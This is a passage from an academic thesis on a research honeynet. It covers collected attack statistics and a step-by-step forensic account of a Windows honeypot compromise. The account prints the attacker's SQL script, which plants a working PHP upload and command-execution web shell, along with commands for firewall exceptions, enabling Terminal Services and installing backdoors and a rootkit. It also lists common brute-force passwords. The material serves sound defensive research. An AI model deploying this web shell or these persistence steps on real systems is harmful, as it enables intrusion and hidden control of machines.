forensic Live CD21 . It contains many applications that are helpful for an investigation, including the md5deep file integrity utility22 . With MD5deep, we can recursively calculate or check cryptographic checksums of entire file systems within a short amount of time. These checksums may then be compared against official black and white lists lists such as the National Software Reference Library (NSRL) in order to quickly identify malicious applications (see NIST, 2008). During the examination, Helix also mounts all partitions of the inspected machine as read-only by default. Consequently, we are never at risk of overwriting valuable information or data. 5.1.4 Summary of the Implementation and Deployment Process Several key factors have to be taken into consideration when deploying a honeynet. First, we recommend setting up at least two decoys with different operating systems and applications to capture attacks on multiple platforms. In our case, we implement honeypots based on both Linux and Microsoft Windows operating systems with various system services that are commonly targeted “in the wild”. A summary illustration of the entire system architecture is presented in Figure 5.7. 21 22 see http://helix.e-fense.com/Download.php see http://md5deep.sourceforge.net/ 96 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.7: System Architecture of the Honeynet The machines must be permanently watched with the help of the Honeywall, a monitoring and filtering gateway device that permits controlling all inbound and outbound network activities. The Honeywall needs to be carefully configured to prevent external third parties from getting harmed. After a honeypot has been compromised, we have to examine the individual steps and actions of the intruder to learn more about her motives, tactics, and intentions. During the analysis, the Walleye web management tool which is part of the Honeywall is of great help. It offers a comfortable user interface for the generated data records, e.g., network packet dumps, firewall logs, and other system-relevant information. In addition to Walleye, a number of further programs are noteworthy for an investigation as well, most importantly Wireshark, a powerful network analyzer that enables inspecting traffic flows in detail. 97 5 Implementation, Deployment, and Analysis of a Honeynet In the following section, we give an overview about the collected honeynet data and outline the results of our research. Two particularly interesting attacks are presented in depth in Section 5.3. 5.2 Overview about the Collected Honeynet Data Our honeynet was successfully connected to the Internet on February 27, 2008. For slightly more than 5 months, we have monitored connections to and from our decoys. During this observation period, we have captured more than 21.5 Gb of raw network traffic, including more than 130 million packets. Manually investigating these huge amounts of data is infeasible. Therefore, a significant level of automation is required to dissect the individual flows and generate statistic reports. The different tools and utilities we have introduced in the previous section are invaluable for these tasks. However, in many cases, we also need to develop our own scripts, e.g., to extract certain text or data patterns, or to examine particularly interesting information in more detail. Unless otherwise stated, these scripts are included on the accompanying CD of this thesis. A concise summary of the interactions with our honeynet is presented below. A description of specific attacks that we have frequently been confronted with is subject of Section 5.2.2. 5.2.1 Interactions with the Honeynet In the course of the observation period, we monitored communication requests from more than 3,900 different IP addresses. As illustrated on the world map depicted in Figure 5.8, the respective hosts were spread over all continents. Areas drawn in darker red reflect clusters with more than 100 machines. The top countries with the highest number of unique systems are shown in Table 5.3. The list comprises China, the United States as well as several Western European countries such as Germany or France. These results are consistent with findings by Holz (2006) and Curran et al. (2005). Surprisingly, many connections were also initiated from computers located in Taiwan. In contrast, many countries in North and Eastern Europe, South America, and Africa did only slightly interact with our honeynet, if at all. These states are visualized in lighter green in Figure 5.8. It is important to note though that not all network flows coming from or going to a honeypot necessarily imply an attack. For example, legitimate system components may periodically contact external servers, e.g., to check for new program updates (cmp. Honeynet Project, 2004b). These update procedures cannot be disabled in all cases. As a result, data records are polluted to a certain degree. For this reason, the amount of captured traffic is neither a reliable indicator for the quantity of incidents, nor for their quality. 98 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.8: Origins of Machines Interacting with the Honeynet # 1 2 3 4 5 6 7 8 9 10 Country China United States Germany Canada Taiwan France Italy Japan Netherlands United Kingdom Number of Systems Involved 868 632 295 226 183 163 142 105 100 80 Table 5.3: Top 10 Countries Interacting with the Honeynet We may estimate the extent of malicious activities more accurately by analyzing notifications that are generated by the Snort intrusion detection system. In sum, more than 13,600 threats were identified. These threats can be distinguished according to their priority rating and their attack classification as indicated in Figure 5.9(a) and Figure 5.9(b). As can be seen, more than 86% of all alerts were raised by autonomously propagating worms or automated password brute force utilities. Password brute force attacks usually intend to compromise the administrative account of a machine as we will see in a later section of this thesis. If such an operation succeeds, the entire system platform is at imminent risk. Therefore, this type of incident must be monitored with a high priority. The same holds true in case a web application is compromised (cmp. Andrews and Whittaker, 2006). Unfortunately, only a small amount of intruders sought to exploit file inclusion vulnerabilities (cmp. Section 5.1.1) or other types of security weaknesses. All of these efforts failed in the end. In contrast, many worms we have observed targeted older vulnerabilities that are fixed on most modern 99 5 Implementation, Deployment, and Analysis of a Honeynet (a) Priority-Based Classification (b) Activity-Based Classification Figure 5.9: Classification of Attacks Reported by the Snort Intrusion Detection System computer systems. A successful penetration is unlikely in these cases. Consequently, these malware species may be investigated with lesser priority. In compliance, port scans and other information gathering attempts do not directly affect the integrity of a honeypot. That is why these activities are rated with a lower priority as well. 5.2.2 Common Attacks on the Honeynet Throughout the observation period, certain types of attacks were repetitively launched against our honeynet. As members of the Honeynet Project report, these types of attacks are commonly found in other honeynet setups as well (cmp. Honeynet Project, 2004b, p. 56-57). However, we need to emphasize that a significant number of the threats presented below were not correctly recognized by the default rule set of the Snort intrusion detection system. The Distributed Denial of Service attacks on one of our decoys that are illustrated in more detail in Section 5.2.2.5 were even not indicated at all. For this reason, we strongly recommend to examine captured traffic flows regularly with additional data analysis utilities. The tools and applications introduced in Section 5.1.3.2 are well suited for these tasks. Thereby, anomalies and suspicious network patterns are likely to be found more easily. 5.2.2.1 Application and Vulnerability Scans Attackers usually go through some phase of active reconnaissance prior to an intrusion in order to learn as much as possible about the target platform (cmp. McClure et al., 2005). This phase includes so-called fingerprinting and mapping techniques that help identify the operating system as well as running services and applications (see Ruef, 2007, for a systematic approach to these steps). A comprehensive knowledge of the system configuration and its flaws may greatly facilitate a later penetration. Despite these findings, information gathering activities are often narrowed down to a certain type of vulnerability only. As a result, adversaries solely test whether or not a system is exposed 100 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 3 4 5 6 7 8 9 GET GET GET GET GET GET GET GET ... / phpmyadmin / main . php HTTP /1.0 / admin / main . php HTTP /1.0 / mysql / main . php HTTP /1.0 / PMA / main . php HTTP /1.0 / phpMyAdmin -2.6.3/ main . php HTTP /1.0 / phpMyAdmin -2.6.2 - rc1 / main . php HTTP /1.0 / phpmyadmin2 / main . php HTTP /1.0 / db / main . php HTTP /1.0 Listing 5.2: Example of a Network Scan for Instances of the phpMyAdmin Database Administration Program to a specific attack. If this is the case, the respective host is exploited, otherwise the blackhat moves on and probes another machine. As members of the Honeynet Project (2004b, p. 563) conclude, most intruders “are not interested in breaking into a specific system, but interested into as many systems as possible” and “focus on the easy kill”. To a great degree, these tasks can be automated with scripts and freely available toolkits. For instance, the DFind23 utility by Arnaud Dovi is able to search for vulnerable web servers, database management systems, and various other security weaknesses. It leaves suspicious traces in the log files as shown in Figure 5.10 though. The string w00tw00t.at.ISC.SANS.DFind clearly stands out and quickly catches the eye of a trained analyst. Therefore, the DFind utility may be detected quite easily. On average, we monitored three of these scans per day. Figure 5.10: Request of the DFind Vulnerability Scanner In addition, our honeypots were frequently checked for installations of the phpMyAdmin database administration program. For this purpose, adversaries sent sample requests to typical application directories. As indicated in Listing 5.2, tests covered both generic as well as specific versions of the software. In total, more than 10,000 connections were initiated, less than 3% were successful and provoked a response. Even though this may appear as a minor fraction, an instance of the program that is fully accessible over the network poses a significant threat to the entire system architecture as we will see in Section 5.3.1. 23 see http://heapoverflow.com/f0rums/projects/tools/20-dfind-port-scanner/ 101 5 Implementation, Deployment, and Analysis of a Honeynet 5.2.2.2 Spam-Related Attacks One type of incident that we have witnessed particularly often is known as the PopUp Spam attack (see Baldwin, 2003). It abuses the Microsoft Windows Messenger Service to deliver unsolicited bulk text messages to computer users. The Messenger Service was originally designed to help system administrators send status messages across a network (cmp. Microsoft Corporation, 2004a). By default, it is solely enabled on Microsoft Windows 2000 operating systems as well as Microsoft Windows XP prior to service pack 2. Modern-day computer systems are not affected. Various techniques do exist to carry out the attack successfully: A spammer may, for instance, invoke a series of simple net send commands to start interacting with the remote message service. In this case, requests are transported via the NetBIOS and SMB (Server Message Block) network protocols (see Baldwin, 2002b). For this purpose, a full TCP connection must be established with the machine of the victim though, and a bi-directional communication channel is opened on port 139. Because this channel may be traced back to the sender, the attacker cannot trivially conceal her identity. A more sophisticated approach is to wrap the message inside a single UDP datagram and pass it directly to the processing queue of the service that is listening on an ephemeral port in the range of 1025 and 1029 (see Baldwin, 2003). The UDP (User Datagram Protocol) protocol is unreliable and connectionless, i.e., packet deliveries do not need to be acknowledged as opposed to the TCP-based transport mechanism used in the prior attack (see Comer, 2000; Postel, 1980). Due to these characteristics, the adversary may forge the source address of the message more easily and stay anonymous. When a spam message arrives at the client system, a notification box “pops up”, indicating a number of security weaknesses had been found that needed fixing. Typically, a specific commercial product is offered for sale as a solution. An example of such a message is shown in Listing 5.3. " STOP ! WINDOWS REQUIRES IMMEDIATE ATTENTION . Windows has found 55 Critical System Errors . To fix the errors please do the following : 1. 2. 3. 4. Download Registry Update from : <xxx > Install Registry Update Run Registry Update Reboot your computer FAILURE TO ACT NOW MAY LEAD TO SYSTEM FAILURE !" Listing 5.3: Example of a PopUp Spam Message 102 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.11: Geographical Spread of PopUp Spam Attacks City Haerbin Mudanjiang Shanghai Shenyang Taiyuan Zhenjiang Number of Systems Involved 78 7 1 2 33 4 Number of Messages Sent 12,925 1,474 4 27 3,772 387 Table 5.4: Origins of PopUp Spam attacks Even though the attack does not cause any direct damage, an inexperienced user potentially falls prey to the con and is tricked to buy a dubious software application. Furthermore, considering the frequency similar messages are received, this type of advertisement quickly gets annoying: On average, we monitored 53 product offers per day. In total, we captured more than 19,200 messages. These messages were entirely sent from 125 machines located in six Chinese cities. The geographical spread of the attacks is visualized in Figure 5.11, a summary of our analysis is given in Table 5.4. 5.2.2.3 Malware-Based Attacks As we have already explained, a large number of alerts were raised by the Snort intrusion detection system due to worm activities. For example, we calculated a mean value of 23 attacks per day solely by the Slammer worm (a.k.a. Sapphire). This type 103 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.12: Packet Dump of the Slammer Worm of malware exploits a buffer-overflow vulnerability in the Microsoft SQL Server 2000 database administration system or in the Microsoft SQL Server Server Desktop Engine (MSDE) (see CERT, 2003a). Due to its small size of slightly more than 400 bytes and a UDP-based propagation strategy, the worm spreads significantly faster than other threats such as Code Red or Nimda (cmp. Moore et al., 2003). The payload of a captured Slammer packet is shown in Figure 5.12. We clearly see several strings such as dllhel32hkernQhounthickChGetTf or toQhsend that may be used to create a unique fingerprint of the worm. Similar techniques can be applied to identify common malicious activities that are monitored within a honeynet. This process can also be automated as illustrated by Kreibich and Crowcroft (2004): With the Honeycomb application24 , it is possible to automatically analyze captured traffic of a honeypot and generate corresponding signatures for network monitoring devices. Similar approaches have also been pursued by Singh et al. (2004) with Earlybird, Kim and Karp (2004) with Autograph, Newsome et al. (2005) with Polygraph, as well as Li et al. (2006) with Hamsa (see also Wang et al., 2006). 5.2.2.4 Password Brute Force and Dictionary Attacks Throughout the entire observation period, our honeypots were constantly hit by automatic brute force or dictionary attacks, i.e., intruders tested a large number of username and password combinations in order to find valid authentication credentials for specific system services and applications such as the secure shell server or the phpMyAdmin database administration program. As indicated in Figure 5.13, the attacking machines were spread over five continents. Many probes originated from western European countries, e.g., France (66,457 attacks) or Sweden (61,247 attacks). However, certain ge24 see http://www.icir.org/christian/honeycomb/ 104 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.13: Origins of Password Brute Force Attacks ographic areas of the eastern hemisphere were significantly involved in the incidents as well. For example, more than 24,000 password checks were detected from cities in Australia, more than 17,000 login attempts were traced to Hongkong. With the help of the trojaned program routines that we had implemented in our system services, we were able to intercept the individual authentication credentials in the clear before they were encrypted (cmp Section 5.1.3.1). In sum, we captured almost 295,000 passwords. After analyzing the data in more detail, we generated a dictionary of about 65,000 unique words. This dictionary may help users assess the quality of their own credentials, because any entry in the list must be regarded as insufficiently strong and reflects a security weakness. The top 30 passwords that we recorded are shown in Table 5.5. As can be seen, password tests included single letters, words, strings concatenated according to the keyboard layout (e.g., asdfgh), sequences of numbers, and variations of these categories (e.g., test123). Furthermore, names of persons, swear words, and derogatory expressions were also frequently chosen. It is also noteworthy that, on average, in three out of 100 attacks, blackhats tried to completely circumvent the authentication procedure and did not specify any password. The majority of intruders sought to compromise the root superuser account of the operating system or the database management application, respectively (see Figure 5.14). In 24% of all cases, a non-privileged user or a non-privileged system account such as ftp or www were targeted. These accounts are often only weakly protected (cmp. Klein, 1990). After a successful breach, the attacker is possibly able to escalate her privileges (see Honeynet Project, 2004b). Therefore, these types of incidents must be regarded as a severe threat, too. What is quite surprising though is the fact that more than 28,000 times, adversaries attempted to log in as admin or administrator. Considering that, by default, these two usernames are usually undefined for both the SSH server as well as for the phpMyAdmin application, the attacks were doomed to fail and imply rather little technical understanding. 105 5 Implementation, Deployment, and Analysis of a Honeynet # 1 2 3 4 5 6 7 8 9 10 Password 123456 123 1234 password 12345 test admin a root 1 # 11 12 13 14 15 16 17 18 19 20 Password roo !@ abc123 qwerty abc changeme adm user master p # 21 22 23 24 25 26 27 28 29 30 Password oracle passwd 1q2 1q2w3e 12345678 mysql 1234567 test123 guest asdfgh Table 5.5: Top 30 Passwords Used During Brute Force Attacks Figure 5.14: User Accounts Targeted By Password Brute Force Attacks 5.2.2.5 Distributed Denial of Service Attacks In addition to the incidents outlined above, our honeynet was also struck by so-called Distributed Denial of Service (DDoS) attacks. One approach to carry out such an attack is to flood the target system with a huge number of network packets (see Peng et al., 2007). Thereby, its resources such as memory or processing time are exhausted, and incoming requests cannot be properly processed any longer. As a result, the performance level is degraded, the server gets unresponsive, and may even crash (see also Handley and Rescorla, 2006; CERT, 2001c). To successfully take the victim off the Internet, the adversary abuses several machines under her control. At a certain point of time, these machines are commanded to start a coordinated packet storm. A schematic overview about this procedure is illustrated in Figure 5.15, a more detailed explanation is given by Mölsä (2005). As Peng et al. (2007) point out, typically either the TCP, ICMP, or UDP network protocols are used as transport mechanisms for these operations. In our case, we have observed four UDP-based DDoS attacks on one decoy. On the respective days, UDP traffic dramatically increased as can be seen in Figure 5.16. The timeline for an attack is 106 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.15: Schematic Overview of a Distributed Denial of Service Attack (Source: Based on Criscuolo, 2000) shown in Figure 5.17. In the first 17 hours prior to the incident, we measured an overall sum of 85 packets only. At the beginning of the attack at 05:03 p.m, this figure suddenly jumped to more than 400,000 packets. For two hours, we monitored between 100,000 and 800,000 packets per minute going to our honeypot. At the end of the DDoS attempt, UDP packet rates quickly decreased, and only 36 further packets were captured in the remaining hours of the day. In total, almost 82 million packets were sent to our machine during the four attacks. 22 systems from 8 countries were involved in the incidents. A summary of the results is shown in Table 5.6. The majority of packets solely contained the single-byte character 0x30 and targeted arbitrary ports of our system (see Figure 5.18). Accessing random port on the machine of the victim is an efficient flooding technique (cmp. Criscuolo, 2000): In many cases, the port in question is likely to be closed. Consequently, in compliance with Postel (1981a), the operating system generates an ICMP Destination Unreachable notification message that is returned to the sender. In sum, these messages act as further amplifiers for the attack and possibly affect other machines on the network as well. Criscuolo (2000, p. 14) concludes: “If enough UDP packets are sent to dead ports on the target host, not only will the target host go down, but computers on the same segment will also be disabled because of the amount of traffic”. Luckily, all outbound messages were successfully blocked by the Honeywall to mitigate risks as best as possible. 107 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.16: Number of UDP Packets Captured per Day in the Honeynet Country United States Thailand Mexico India South Korea France United Kingdom Japan Number of Systems Involved 6 5 3 3 2 1 1 1 Number of Packets Sent 37,932,042 21,217,361 14,024,735 4,527,677 3,828,526 160,622 110,566 83,755 Table 5.6: Countries Involved in Different Distributed Denial of Service Attacks In about 16% of the captured data samples, we extracted larger payloads up to 50 bytes that were destined for the two UDP ports 22 and 80. We were unable to determine why specifically these ports were flooded though. Mirkovic and Reiher (2004) and Chang (2002) have identified several motives for DDoS attempts, e.g., inflicting damage on business competitors due to monetary reasons. However, these motives are not sufficiently applicable to our honeynet architecture. Therefore, why our decoy was attacked remains speculative in the end. 108 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.17: Timeline of a UDP Packet Storm on a Honeypot Figure 5.18: Analysis of a UDP Packet Storm 109 5 Implementation, Deployment, and Analysis of a Honeynet 5.3 Selected Attacks on the Honeynet In the following, we present two attacks on our honeypots in detail. We illustrate the tools and tactics that were of great help during the intrusion as well as try to explain why the systems were targeted and what they were used for once the had been penetrated. 5.3.1 Attack on the Microsoft Windows Honeypot Our Microsoft Windows-based honeypot was successfully compromised less than 24 hours after we had connected the decoy to the Internet. A summary of the attack sequence is presented below, shortly followed by an evaluation of the incident. A basic personal profile as well as a taxonomy of the intruder are subject of Section 5.3.1.3 and 5.3.1.4. 5.3.1.1 Sequence of the Attack On February 28 at 7:44:59 p.m., the phpMyAdmin database administration program is opened over the HTTP protocol by an adversary with the IP address 87.230.xxx.xxx. Due to improper configurational settings, the application is fully accessible over the Internet as we have stated in Section 5.1.1. Consequently, the individual components are prone to manipulation, including the mysql main database that saves sensitive information such as usernames and passwords. However, the blackhat does not take notice of the data but begins to import a prepared SQL (Structured Query Language) script that is printed in Listing 5.4. When it is executed, a basic file upload utility is created in the root directory of the server that also permits running arbitrary commands on the host. To perform said operations, a temporary database table needs to be generated (see Line 1). It is deleted with the help of the drop instruction at the end of the script to erase the traces of the intrusion. Although the techniques described above are quite simple, they clearly demonstrate how a misconfigured database management system may easily put the underlying platform at risk. At 7:47:31 p.m., the attacker starts downloading a number of tools after briefly checking the configuration of the network interface card. Using the rcp command which is part of the operating system, a remote connection with the IP address 85.176.xxx.xxx is established, and a file mo.php is transferred to the target machine. This file is recognized as a variant of the c99 shell, a trojan backdoor that is written in the PHP programming language. As can be seen in Figure 5.19, the trojan comprises a powerful graphical interface that offers many features, including browsing through the entire directory hierarchy, editing or deleting contents, and executing commands. 110 5 Implementation, Deployment, and Analysis of a Honeynet 1 create table dblog ( text text ) ; 2 3 4 insert into dblog set text = ’ <? $sendfile = $_REQUEST [ " sendfile " ]; $cmd = $_REQUEST [ " - cmd " ]; 5 if ( $sendfile == " true " ) { $fn = $_FILES [ " file " ][ " name " ]; $tn = $_FILES [ " file " ][ " tmp_name " ]; 6 7 8 9 if ( m ov e_ up lo ad ed _f il e ( $tn , dirname ( __FILE__ ) . " / " . $fn ) ) $result = " <br > < font color = green > upload done </ p > " ; else $result = " <br > < font color = red > upload failed </ p > " ; 10 11 12 13 } ?> 14 15 16 < html > < body > < form method = POST > < input type = TEXT name = " - cmd " size =64 value = " <?= $cmd ? > " > </ form > < form enctype = " multipart / form - data " method = " post " action = " " > < input type = file name = file size =20 > < input type = " submit " value = " Upload " > < input type = " hidden " name = " sendfile " value = " true " > <?= $result ? > </ form > <pre > <? if ( $cmd != " " ) echo shell_exec ( $cmd ) ;? > </ pre > </ body > </ html > ’; 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 select * from dblog into outfile ’C :/ xampp / phpMyAdmin / db_log . php ’; DROP TABLE ‘ dblog ‘; FLUSH LOGS ; Listing 5.4: Manipulation of the System Database Apart from the c99 shell, two additional files are copied to the honeypot, namely secure.old and secure.exe. The latter is identified as the Serv-U file transfer server by Rhino Software25 . The program can be silently installed and invoked on the command line and therefore enjoys a questionable reputation in the underground community (see Rhino Software, 2004; Baldwin, 2002a). The second file, secure.old, contains initialization instructions as well as a list of pre-defined account names that may be used to log in to the server. After all operations are completed, the attacker quickly verifies that the two components have been successfully transferred to the decoy by running the dir command and listing the contents of the root directory. With the help of the PHP shell, the Serv-U FTP server is installed as a system service in the next step (see Listing 5.5). Furthermore, an exception is added to the local firewall rules to avoid traffic filtering and allow incoming 25 see http://www.serv-u.com/ 111 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.19: User Interface of the c99 shell Trojan Backdoor requests. At last, the service is started with the net start command and gets bound to six different network ports. Again, the intruder attempts to disguise her activities by choosing several well-known ports, e.g., port 53 that is registered for DNS (Domain Name Service) lookups (see Internet Assigned Numbers Authority (IANA), 2008). At 7:51:45 p.m., a first FTP session is initiated, and a small-sized binary bw1.exe is stored on the decoy. The program is capable of measuring the bandwidth of the Internet connection. For this purpose, a sample file must be repeatedly retrieved. In our case, the Service Pack 3 for Microsoft Windows 2000 is downloaded 10 times. In total, more than 1.25 GB of data are sent to our machine during this process. At the end of the speed test, the attacker saves an audio file to the special directory System Volume Information on the primary partition of the hard disk. This directory usually contains information about certain system restore points and cannot be accessed at runtime by default (see Russinovich and Solomon, 2004). The restrictions only apply to the local computer though and can be circumvented through the external FTP communication. Under normal circumstances, the actions of the intruder would thus be hidden from the eyes of legitimate users. 112 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 # the attacker secure . exe / i i n s t a l l s t h e S e r v −U FTP s e r v e r a s a s y s t e m s e r v i c e 3 4 5 6 # an e x c e p t i o n i s a d d e d t o t h e l o c a l f i r e w a l l r u l e s netsh firewall add allowedprogram C :\ xampp \ phpMyAdmin \ secure . exe ftp ENABLE 7 8 9 # the system s e r v i c e i s net start secure finally started Listing 5.5: Installation of the Serv-U FTP Server 1 @echo off 2 3 ... 4 5 6 7 8 # s t o r e t h e new v a l u e s i n t h e h e l p e r f i l e C : \ h i d e . r e g echo Windows Registry Editor Version 5.00 > c :\ hide . reg echo [ HKE Y_ LO CA L_ MA CH IN E \ SYSTEM \ Cu rrentC ontrol Set \ Control \ Terminal Server ] > > c :\ hide . reg echo " All ow TS Co nn ec ti on s " = dword :00000001 > > c :\ hide . reg 9 10 11 12 # import the v a l u e s to the system r e g i s t r y REGEDIT / S c :\ hide . REG 13 14 15 # delete the helper DEL / Q c :\ hide . REG file 16 17 ... Listing 5.6: Modification of the System Registry In the following two hours, several further tools are stored on the honeypot to stay in control of the machine and conceal the incident. First, the adversary uploads a batch file ts.bat that modifies certain values in the system registry in order to enable the Microsoft Terminal Service. An extract of the file is shown in Listing 5.6. With the help of the service, it is possible to administrate the operating system over the network. At 8:10:25 p.m, the attacker copies a different variant of the c99 trojan backdoor to the root directory of the phpMyAdmin web application that serves as a replacement for the original PHP shell. The file is disguised as tbl_index.php. What is more interesting, the source code of the trojan is obfuscated, i.e., it is made illegible by encoding all embedded strings, variables, and programming instructions. Thus, reverse engineering of the program is significantly more difficult, and antivirus scanners as well as malware removal utilities may possibly be bypassed. 113 5 Implementation, Deployment, and Analysis of a Honeynet 1 2 3 4 5 6 7 8 9 del del del del del del del del del \ sql . php / S / Q / F >> Found . txt \ server_variables . php / S / Q / F >> Found . txt \ read_dump . php / S / Q / F >> Found . txt \ import . php / S / Q / F >> Found . txt \ s erver_ privil eges . php / S / Q / F >> Found . txt \ tbl_replace . php / S / Q / F >> Found . txt \ phpinfo . php / S / Q / F >> Found . txt \ main . php / S / Q / F >> Found . txt 1. bat Listing 5.7: System Hardening Operations on the Compromised Honeypot The intruder also deletes several software modules of phpMyAdmin by running another batch file, 1.bat, which is transferred to the decoy (see Listing 5.7). On the one hand, these actions severely damage the application so it cannot be executed any longer. On the other hand, the entry point to the system is closed, and related attacks are effectively prevented. As indicated in Listing 5.7, the result of each delete operation is appended to the temporary file Found.txt to make sure the machine has been successfully hardened. This file is downloaded at a later point of time. At 8:12:23 p.m., the attacker starts covering her tracks and erases a number of programs that are not needed any more, including the original c99 shell. In the last step, various supplemental components for the Serv-U daemon are copied to a subfolder in the Windows system directory before the FTP session is terminated. The individual components are listed in Table 5.7 and are required to install another version of the Serv-U FTP server. The application is disguised as a DNS server and supports encrypted data transfers. Run Level a.bat Dnslib32api.cat Dnstts.exe MD5 Checksum Description Batch script that is executed to install a disguised version of 4a8786fffb14bb8facf288f3cffcf42e the Serv-U FTP server with support for encrypted data transfers. Auxiliary file for the 1c0aacaf30b92277cfe55af07c200cfc disguised FTP server. Main executable of the cfe9801298579cd93e340d4cb84af8fd disguised Serv-U daemon. Table continues on the following page. 114 5 Implementation, Deployment, and Analysis of a Honeynet Run Level MD5 Checksum libeay32.dll, ssleay32.dll cfe9801298579cd93e340d4cb84af8fd d18bcf48a7624154745c0526cc8576f3 ServUCert.crt, ServUCert.key 7b8fa286633f087b2faf9a9584dcc72a 2293486183632e8634aa30a1798bc5e7 Description Dynamic libraries that provide cryptographic functions in order to establish a secured connection. Security certificate and private key of the FTP server that are needed to initiate an encrypted session. Table 5.7: Additional Components of the Serv-U FTP Server that are Required to Establish a Secured Connection Three minutes later, at 8:15:24 p.m., such a secured channel is established with the server. Due to the use of strong encryption algorithms, examining the corresponding traffic flows would usually be infeasible at this point. In our case though, we are in possession of the private key of the server which is needed to decypher the network packets. Unfortunately, the key is protected with an unknown pass phrase and, thus, cannot be processed directly. To find the pass phrase, we run the strings utility which is included in most Linux distributions and extract all text patterns that are referenced by the server. After a short inspection of the results, we are lucky and succeed in generating a new, unencrypted private key by executing the free OpenSSL cryptography toolkit26 as follows (cmp. OpenSSL Project, 2003): openssl rsa - passin pass :[ pass phrase ] - in ServUCert . key - out ServUCert - Unencrypted . key In the next step, the new key can be imported to the Wireshark network analyzer as explained by Garland (2008). The captured data are then automatically decrypted as indicated in the lower right corner of Figure 5.20. As a consequence, we are able to recover the activities of the intruder and proceed with our investigation. Analyzing the secured session: Feeling protected by the encrypted communication channel, the adversary starts uploading a number of further utilities at 8:15:54 p.m.: The script install.cmd sets up a new system service lsasvc.exe which is identified as the Hacker Defender rootkit, version 1.0. The rootkit is capable of hiding specific files, processes, system registry keys, and network ports that are defined in a corresponding initialization file. In our case, all traces of the attack tools are removed. For instance, the newly installed FTP and DNS servers are excluded from the process list (see Figure 5.21). What is quite peculiar is the fact that various legitimate system components such as 26 see http://www.openssl.org/ 115 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.20: Analyzing Encrypted Network Traffic with Wireshark the service management screen or the Windows firewall are disabled during this process, too. Thereby, the attacker makes sure the original state of the compromised machine cannot be easily restored on the one hand. On the other hand, these types of system manipulations are extremely conspicuous and are likely to be detected by any system administrator. In addition to the rootkit, the intruder saves three dynamic libraries to a subfolder in the installation directory of the operating system. These libraries provide auxiliary functions for the Serv-U FTP server, e.g., to retrieve summary reports about the number of users that are currently logged in or to calculate the total amount of data that were transferred in the course of a FTP session. Furthermore, they enable to display personal messages or logos when a connection has been successfully established. Although this rather seems as a minor feature, custom login banners are frequently used by blackhats to “advertise” their name, greet competing groups, and gain social status in the underground community (cmp. Honeynet Project, 2004b; Craig and Burnett, 2005; Rogers, 116 5 Implementation, Deployment, and Analysis of a Honeynet (a) Running processes on the system before the rootkit is being executed. (b) After the rootkit has been installed, specific processes are removed from the process list. Figure 5.21: Subversion of a System With the Hacker Defender Rootkit 2000b). An example of such a banner that we captured on our honeypot is presented in Figure 5.22. After all operations are completed, the adversary invokes an internal site maintenance interface multiple times to check the functionality of the server. With the help of this interface, it is possible to adapt core configurational settings of the service over a remote connection such as changing the network ports the application is bound to. In the last step, the adversary logs in as the alternative user fill0r, uploads an audio file as well as the first part of a pirated DVD to a subdirectory of the xampp distribution, and rechecks the status of the FTP server. The connection is finally closed at 9:54:27 p.m. At this point, we decide to shut down our honeypot and start analyzing the compromise. The individual tools that were used for the penetration are summarized in chronological order in Table 5.8, a timeline for the entire attack sequence is illustrated in Figure 5.23. 117 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.22: Custom Login Banner of the Attacker Attack Tool db_log.php mo.php secure.exe, secure.old MD5 Checksum Description Basic file upload and command execution util72527be487571260838fa8ada207ca46 ity that is used by the intruder to retrieve additional attack tools. PHP-based trojan backdoor c99 shell that comprises a significant amount of file as well as system manipulation 34e47e3d7711889e4abe5d64d153eda2 functions. The shell is run to install a number of system services, including the FTP server described below. Server component and initialization file of the Serv-U FTP Server. e7c177b23210819b4a9087343351e045, With the help of the b7b4cce7b902a9c735c27c9b22054c56 server, further utilities are transferred to the honeypot. Table continues on the following page. 118 5 Implementation, Deployment, and Analysis of a Honeynet Attack Tool MD5 Checksum bw1.exe 31924ef0ae98f9cf7884d41d91499751 ts.bat 64f1bb47710b59ccc03efa1c09d355c3 tbl_index.php 4959954f89270ef01979029d180ee3c5 1.bat 6a48b5bfa1a60f4620077acd253ba245 install.cmd, lsasvc.exe, lsasvc.ini 906590f18a9065b055d52f779e1dc220, 29d6dfbb62cb51674f4b6d00976e5288, 68b19fe27a6aea5519f2519a6ee3658a on.dll, off.dll, dir.dll 4b61fae8269e6875189b681446a645c0, 7f538611e5ee85211a1a979d2dd94a5b, 2012dd7c39441d80a684ed4d45f07c0f Description Speed test utility that measures the bandwidth of the Internet connection. Thereby, the adversary is able to assess the value of the compromised machine. Batch script that enables the Microsoft Terminal Service in order to provide the intruder with a graphical remote user interface. Obfuscated version of the c99 shell which is set up to maintain access to the system. Batch script that deletes various core components of the phpMyAdmin database management system to harden the machine against further attacks. Setup and program files of the Hacker Defender rootkit. The rootkit subverts the operating system and helps conceal the incident. Supplemental files for the Serv-U FTP server that provide auxiliary function, e.g., displaying custom banners or status information about the service. Table 5.8: Attack Tools Used During the Compromise of the Windows Honeypot 119 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.23: Timeline of the Attack on the Windows Honeypot 120 5 Implementation, Deployment, and Analysis of a Honeynet 5.3.1.2 Evaluation of the Attack Due to a poorly configured instance of the phpMyAdmin database administration program, the attacker is able to easily gain administrative privileges and upload her own tools. These tools include a trojan backdoor that permits manipulating the entire machine over the Internet as well as a rootkit that is capable of subverting the operating system in order to conceal the incident. In the next step, the intruder sets up a file transfer server and begins to store several audio and video files. We assume these files are to be made available for software pirates. This assumption is based on the following findings: First, the FTP server is configured to grant access to numerous users, e.g., to the user fill0r, but also to various so-called leeches. A fill0r27 is responsible for “filling” an exploited host with applications, movies, or other types of media, while leeches typically consume the stored material only and do not share their own contents (see “B-Bstf” Smith, 2004). Second, the server keeps track of the data that is transferred to and from the decoy and displays detailed usage statistics. Third and last, users are explicitly invited to “squeeze out every bit” of the machine28 . Taking the different aspects into consideration, we expect our honeypot is to be turned into a so-called public stro (or 